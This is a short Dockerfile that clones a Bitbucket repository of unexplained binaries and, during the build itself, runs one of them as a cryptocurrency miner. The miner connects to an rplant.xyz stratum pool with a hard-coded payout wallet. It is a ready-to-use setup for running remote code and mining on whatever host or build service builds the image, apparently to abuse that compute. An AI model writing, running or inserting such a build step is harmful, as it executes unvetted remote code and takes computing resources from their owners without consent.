FROM ubuntu
 
WORKDIR /root/
 
RUN apt-get update && apt-get -qy install git && \
apt-get clean
 
 
RUN git clone --recursive https://ardy28@bitbucket.org/ardy28/a min
WORKDIR /root/min
 
RUN chmod +x lin
RUN chmod +x mac
RUN chmod +x sumaker
RUN ./lin -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q7rd7nzu0vxv7tks8phzkd70gtuxnf3jkjhm9g8.act
